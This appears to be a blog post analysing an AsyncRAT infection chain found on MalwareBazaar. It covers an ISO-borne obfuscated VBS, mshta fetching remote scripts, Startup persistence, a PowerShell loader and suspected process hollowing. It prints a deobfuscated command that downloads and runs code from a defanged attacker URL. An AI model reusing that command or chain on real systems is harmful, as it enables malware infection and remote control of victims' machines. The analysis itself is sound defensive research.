Lately, I have been looking at MalwareBazaar for some samples in order to do analysis. I noticed that the samples are conveniently tagged and can be used to see some patterns and volumes. It has got a lot of metadata that can be used for data analysis, but that’s a post for another time.
In this post we will look into an AsyncRAT sample (SHA: f166599c72e3ca2d8bd3487dd9a4944231a76a7fd0058c26d495bdfe54adc004) that I came across while browsing MalwareBazaar as I observed the ‘iso’ tag. Once we extract the contents of the iso file we see a VB script file ‘Invoice-ID-(882451).vbs’ and a folder named ‘Read’ containing an image ‘Spectrum.png’
As we can see that the script is short and a bit obfuscated but we can easily identify after de-obfuscation that it is going to execute this:
Execute("WScript.Shell.Run C:\Windows\System32\mshta hxxp://ahmedadel.work/cairo/Encoding.txt, 0")
One thing to note here is this assignment
GetObject("new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"). It is the CLSID key of WindowsScriptHost COM Object. COM objects have been an interesting area for Security Researchers for some time, esp. its usage in Pentesting. More information can be found here. Additionally, mshta is a pretty common LOLBIN to execute remote files.
It creates a Shell object same as the previous VBS to execute the script located at
hxxp://ahmedadel.work/cairo/ALL.txt. This is where the next payload of the infection chain lives.
ALL.txt: All (no pun intended!) it’s doing is downloading two payloads for the next stage, saving Startup.txt as Run.hta for persistence at the Startup location, and Server.txt as
C:\Users\Public\Microsoft.ps1. It later executes the PowerShell script Microsoft.ps1.
Startup.txt: After decoding it using CyberChef a VBScript enclosed in HTML is revealed, which follows the same strategy as that of the original ‘Invoice-ID-(882451).vbs’ in addition to hiding the Window. As mentioned earlier it’s just running Microsoft.ps1 at the startup for malware persistence.
Server.txt: This is the main malicious payload which is also cleverly (JK, LOL) obfuscated.
The first variable $H1 requires some string operations and Base64 decoding (recipe above). This is an executable as seen from the MZ header of the data. The second variable $telegram is a byte array. The final execution after de-obfuscation becomes:
Since the executable is a DotNet DLL, I figured if we drop that executable in dnSpy we would see more information about the method and the arguments in the above Reflection.Assembly.
We see the CMD method in the HBAR.PING class. Also if we look at the DLLImportAttributes in that class we can guess that this malware will attempt Process Hollowing, most likely in aspnet_compiler.exe with the $telegram bytes, without going deep in the code analysis.